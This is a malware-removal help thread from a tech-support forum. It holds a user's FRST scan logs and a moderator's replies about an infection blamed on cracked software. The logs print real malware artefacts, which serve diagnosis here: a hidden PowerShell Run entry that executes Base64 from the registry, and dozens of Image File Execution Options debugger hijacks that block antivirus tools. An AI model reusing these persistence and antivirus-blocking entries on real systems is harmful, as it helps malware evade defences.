2012-11-03 17:47 - 2012-11-03 17:47 - 00076888 _____ () C:\Windows\system32\PnkBstrA.exe
2015-08-15 00:33 - 2015-08-15 00:33 - 00188072 _____ () C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
2013-10-30 11:53 - 2011-12-19 14:10 - 00246112 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\ouc.exe
2011-12-19 14:11 - 2011-12-19 14:10 - 00011362 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\mingwm10.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 00043008 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\libgcc_s_dw2-1.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 02415104 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QtCore4.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 01148416 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QtNetwork4.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 00384512 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QueryStrategy.dll
2011-12-19 14:11 - 2011-12-19 14:10 - 00398336 _____ () C:\ProgramData\Telenor Internet\OnlineUpdate\QtXml4.dll
2016-05-11 08:48 - 2016-05-11 08:48 - 00041472 _____ () C:\Program Files\TunnelBear\TBear.Maintenance.exe
2016-09-14 09:30 - 2016-09-14 09:30 - 19588800 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_162.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [119]
AlternateDataStreams: C:\ProgramData\TEMP:AD022376 [131]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\N1Service => ""="service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-19\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-19\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-19\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-19\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-20\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-20\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-20\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-20\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\sony.com -> sony.com

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:04 - 2016-03-12 11:16 - 00000967 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^violeta^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Minecraft Gift Code Generator 2015.lnk => C:\Windows\pss\Minecraft Gift Code Generator 2015.lnk.Startup
MSCONFIG\startupfolder: C:^Users^violeta^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: AdobeCS4ServiceManager => "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: BingSvc => C:\Users\violeta\AppData\Local\Microsoft\BingSvc\BingSvc.exe
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: LogMeIn Hamachi Ui => "C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
MSCONFIG\startupreg: ProductUpdater => C:\Program Files\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
MSCONFIG\startupreg: PWRISOVM.EXE => C:\Program Files\PowerISO\PWRISOVM.EXE -startup
MSCONFIG\startupreg: Skype => "C:\Program Files\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Trend Micro Titanium => C:\Program Files\Trend Micro\Titanium\UIFramework\uiWinMgr.exe -set Silent "1" SplashURL ""
MSCONFIG\startupreg: uTorrent => "C:\Users\violeta\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
MSCONFIG\startupreg: WinampAgent => "C:\Program Files\Winamp\winampa.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled
02-10-2016 19:00:52 Windows Backup
09-10-2016 19:02:11 Windows Backup

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/14/2016 09:37:50 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files\Steam\bin\steamwebhelper.exe

Error: (10/14/2016 02:10:02 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files\Steam\bin\steamwebhelper.exe

Error: (10/13/2016 09:04:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CompatTelRunner.exe, version: 10.0.14913.1002, time stamp: 0x57d102c7
Faulting module name: devinv.dll, version: 10.0.14913.1002, time stamp: 0x57d1049e
Exception code: 0xc0000005
Fault offset: 0x0002ec20
Faulting process id: 0x16e4
Faulting application start time: 0x01d2251cd937f0d3
Faulting application path: C:\Windows\system32\CompatTelRunner.exe
Faulting module path: C:\Windows\system32\devinv.dll
Report Id: 3aa44c8c-9113-11e6-8fc5-6c626daeeb0d

Error: (10/12/2016 10:58:40 PM) (Source: Windows Search Service) (EventID: 3007) (User: )
Description: Performance monitoring cannot be initialized for the gatherer object, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.

Context: Application, SystemIndex Catalog

Error: (10/12/2016 03:17:00 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: NIKOLA-PC)
Description: HRESULT:0x8004FF0A
Description:Microsoft Security Essentials installation was canceled. You canceled the Security Essentials installation on your computer. Error code:0x8004FF0A.

Error: (10/06/2016 05:34:29 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: NIKOLA-PC)
Description: HRESULT:0x8004FF81
Description:Cannot complete the Security Essentials installation. An error has prevented the Security Essentials setup wizard from completing successfully. Please restart your computer and try again. Error code:0x8004FF81.

Error: (10/06/2016 05:33:53 PM) (Source: MsiInstaller) (EventID: 11920) (User: NIKOLA-PC)
Description: Product: Microsoft Security Client -- Error 1920. Service 'Microsoft Antimalware Service' (MsMpSvc) failed to start. Verify that you have sufficient privileges to start system services.

Error: (10/03/2016 12:21:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.1.6109, time stamp: 0x57e44563
Faulting module name: webplayer_win.dll_unloaded, version: 0.0.0.0, time stamp: 0x557572cf
Exception code: 0xc0000005
Fault offset: 0x066bbab8
Faulting process id: 0x7fc
Faulting application start time: 0x01d21d5ae9318998
Faulting application path: C:\Program Files\Mozilla Firefox\plugin-container.exe
Faulting module path: webplayer_win.dll
Report Id: 29c3f0e0-8953-11e6-ae4e-6c626daeeb0d

Error: (10/02/2016 08:25:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.1.6109, time stamp: 0x57e44563
Faulting module name: mozglue.dll, version: 49.0.1.6109, time stamp: 0x57e43eea
Exception code: 0x80000003
Fault offset: 0x0000e846
Faulting process id: 0x1c00
Faulting application start time: 0x01d21cc346a799d6
Faulting application path: C:\Program Files\Mozilla Firefox\plugin-container.exe
Faulting module path: C:\Program Files\Mozilla Firefox\mozglue.dll
Report Id: 9aac06d4-88cd-11e6-8fc8-6c626daeeb0d

Error: (10/02/2016 08:25:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.1.6109, time stamp: 0x57e44563
Faulting module name: mozglue.dll, version: 49.0.1.6109, time stamp: 0x57e43eea
Exception code: 0x80000003
Fault offset: 0x0000e846
Faulting process id: 0x1a2c
Faulting application start time: 0x01d21cd94ba02c13
Faulting application path: C:\Program Files\Mozilla Firefox\plugin-container.exe
Faulting module path: C:\Program Files\Mozilla Firefox\mozglue.dll
Report Id: 91f51069-88cd-11e6-8fc8-6c626daeeb0d


System errors:
=============
Error: (10/14/2016 10:07:31 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
sfdrv01
sfsync02

Error: (10/14/2016 10:07:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Telenor Internet. OUC service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (10/14/2016 10:07:19 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Telenor Internet. OUC service to connect.

Error: (10/14/2016 10:07:15 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Skype C2C Service service to connect.

Error: (10/14/2016 10:07:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Origin Web Helper Service service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (10/14/2016 10:07:13 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Origin Web Helper Service service to connect.

Error: (10/14/2016 1040 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HWDeviceService.exe service failed to start due to the following error:
The system cannot find the file specified.

Error: (10/14/2016 1032 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Trend Micro Solution Platform service failed to start due to the following error:
Access is denied.

Error: (10/14/2016 1008 PM) (Source: Application Popup) (EventID: 875) (User: )
Description: Driver sfdrv01.sys has been blocked from loading.

Error: (10/14/2016 1006 PM) (Source: Application Popup) (EventID: 875) (User: )
Description: Driver sfsync02.sys has been blocked from loading.


==================== Memory info ===========================

Processor: Intel(R) Celeron(R) CPU E3400 @ 2.60GHz
Percentage of memory in use: 48%
Total physical RAM: 2013.18 MB
Available physical RAM: 1034.57 MB
Total Virtual: 2588.18 MB
Available Virtual: 1340.15 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:459.9 GB) (Free:43.06 GB) NTFS
Drive d: (SPYRO_DVD) (CDROM) (Total:7.16 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 33317A4D)
Partition 1: (Active) - (Size=5.9 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=459.9 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


the ckfiles.txt log didnot fit in the alllowed amount of characters so i will simply attach it.
Attached Files
File Type: txt ckfiles.txt (22.9 KB, 28 views)
nikolap is offline  
Sponsored Links
Advertisement
 
Old 10-15-2016, 02:54 PM   #4
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Quote:
c:\users\violeta\desktop\rpg maker mv plugins\rmmv-crack\rmmv - crack\windows 7\rpgmv.exe
c:\users\violeta\desktop\rpg maker mv plugins\rmmv-crack\rmmv - crack\windows 8-10\rpgmv.exe
c:\users\violeta\documents\spore\crack\rld-spor.exe
c:\users\violeta\desktop\sve sa desktopa\marijne stvari\rust\rust 14.03 cracked [derpteam].zip
c:\users\violeta\desktop\sve sa desktopa\ssb crusade v0.9 patch\crypt.dll
c:\users\violeta\desktop\stellaris +updates\stellaris.update.v1.1.0.to.v1.2.1-rezmar\cracks\codex\steam_api.dll
c:\users\violeta\desktop\cracks\crack codex\steam_api.dll
c:\users\violeta\desktop\unhackme 7.80 build 480 + crack [4realtorrentz].zip
c:\users\violeta\music\violeta za budjenje\keygen.exe
This is the main reason your computer is infected. Visiting cracksites/warezsites - and other questionable/illegal sites is always a risk.

Even a single click on the site can drop multiple forms of very serious malware, many of which disable your onboard protection, and System Restore.

If you install the cracked software, you are running executable files from these dubious, unknown sources. You are in effect giving these sources access to information on your hard disk, and potential control over the operation of your computer.

Additionally, cracked programs are illegal. Before posting for help, we ask that you uninstall any such applications, as indicated in this sticky topic.

Referring to the Forum Rules which you should have read at the time of Registering at this forum, TSF does not support illegal activity. As such, be advised that any request for assistance in removing malware may go unanswered, or may be discontinued, if the cracked (illegal) software is still present on the machine.

A recent study revealed that more often than not, keygens and crack tools downloaded from peer-to-peer networks contained malicious or "unwanted" software.

------------------------------------------------------

==== Installed Programs ====

RPG Maker MV
RPG MAKER VX Ace RTP
SPORE
Steam
Stellaris
UnHackMe


------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-15-2016, 11:58 PM   #5
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



I have dealt(de-installed) with all illegal content that you said was illegal,but i did not pirate or got some illegal copy of SSBC(super smash bros 0.9) i got the game from the link the devs have given us on facebook,the games forum and so on.
With all of the cracked and pirated content gone i checked the firewall again.
it seems to not be fixed.My guess is because those files were used before the problem,which i noticed when i was deleting.
*NOTE none of my problem is illegal(my windows is genuine,i am listening to your instructions and following them) this is a serious problem and someone might have a simillar problem in the future.
**NOTE i ask for help.If you need all of the other logs i can make them again as proof and as a thing for proggression.
nikolap is offline  
Old 10-16-2016, 01:12 PM   #6
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. Did you also delete all those cracked installers listed?

Please run FRST.exe again and post/attach the FRST.txt/Addition.txt logs as before.

Make sure you tick the Addition.txt box before clicking 'Scan'.

Instead of pasting the Attach.txt log in your reply, just please attach it to your next reply.

Also, when you first copy/pasted the FRST.txt log, you didn't paste the entire log. The bottom part was missing.

Make sure you copy and paste the entire FRST.txt log. Thanks.

------------------------------------------------------

Please go to: VirusTotal
  • Click the Choose File button.
  • Please copy/paste the following bolded text into the 'File name:' box:

    C:\Windows\system32\Microsoft.com

  • Click Open then click the Scan it! button just below.
  • This will scan the file. Please be patient.
  • If you get a message saying File already analysed: click Reanalyse
  • Once scanned, copy and paste the URL from your browser address bar in your next reply.
----------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-16-2016, 10:00 PM   #7
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



The microsoft.com file:
hxxps://www.virustotal.com/en/file/97bd627ebfc4d40b21ebaaed916a1ba53859520edc99537b37d042a0d5425a5a/analysis/1476680245/
the entire FRST.txt log:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 16-10-2016
Ran by violeta (administrator) on NIKOLA-PC (17-10-2016 06:40:43)
Running from C:\Users\violeta\Desktop
Loaded Profiles: violeta (Available Profiles: violeta)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files\Hi-Rez Studios\HiPatchService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
() C:\Windows\System32\PnkBstrA.exe
() C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
(Razer Inc.) C:\Program Files\Razer\Razer Cortex\RzKLService.exe
(ShadowExplorer.com - About) C:\Program Files\ShadowExplorer\sesvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Rocket Division Software) C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
() C:\Program Files\TunnelBear\TBear.Maintenance.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation.) C:\Program Files\Microsoft\BingBar\7.1.362.0\SeaPort.EXE
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5565960 2016-09-13] (LogMeIn Inc.)
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [225944 2016-07-11] ()
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [AlcoholAutomount] => C:\Program Files\Alcohol Soft\Alcohol 120\axcmd.exe [203928 2009-04-24] (Alcohol Soft Development Team)
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NYQUMMEV').KgJaKWdyhxnot)));
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CurrentVersion\Windows: [Load] C:\Windows\system32\Microsoft.com <===== ATTENTION
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: E - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: H - H:\setup.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {77b5a5be-29d4-11e1-ac3d-806e6f6e6963} - D:\setup\rsrc\Autorun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c5841f0c-20e0-11e6-8237-6c626daeeb0d} - I:\INSTALL_ADB_RNDIS.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0150-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0177-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fad-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [280576 2013-04-30] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 1
IFEO\AvastSvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\AvastUI.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avcenter.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avconfig.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgcsrvx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgidsagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgrsx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avguard.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgwdsvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avp.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avscan.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\bdagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ccuac.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ComboFix.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreFrameworkHost.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreServiceShell.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\egui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\hijackthis.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\instup.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\keyscrambler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbam.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbampt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamscheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamservice.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MpCmdRun.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MSASCui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MsMpEng.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\msseces.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\rstrui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\spybotsd.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\SSScheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesApp32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesService32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiSeAgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiWatchDog.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\wireshark.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\zlclient.exe: [Debugger] C:\Windows\system32\Microsoft.com
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
Startup: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN [2015-03-20] ()
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [147456 2008-12-12] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{5A19095F-7933-4DA1-AD09-19E979DC22C7}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{79289764-7478-4021-A6D0-8EAF6EFDDD53}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{79976A8E-F478-4642-88DD-27DD71B01DC2}: [DhcpNameServer] 172.18.12.1
Tcpip\..\Interfaces\{9F6CCFF6-FC61-4F75-BD9A-39A7BE019C6E}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{C2E0376F-F85D-46E3-80E2-201AFBF0F518}: [NameServer] 217.65.192.101 217.65.192.102

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE07&ocid=UE07DHP
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3McXDvdSN6JAXeQNqF9tomnI4v_-Q-v4mvx2kMn7Bh-Xf-EJYEejn7YWcl-PlhbuddCMlP0mwyMzARSqo7-Wmu3hY49Niunccg3DmrDXz5ysmP3WX7Aete0Eac57BLcvq82zb4dfcwWjZDbkUtDIRutjgO4XjIKICjIB-c42AaU,&q={searchTerms}
URLSearchHook: [S-1-5-21-3268508096-794200350-1188608446-1000] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
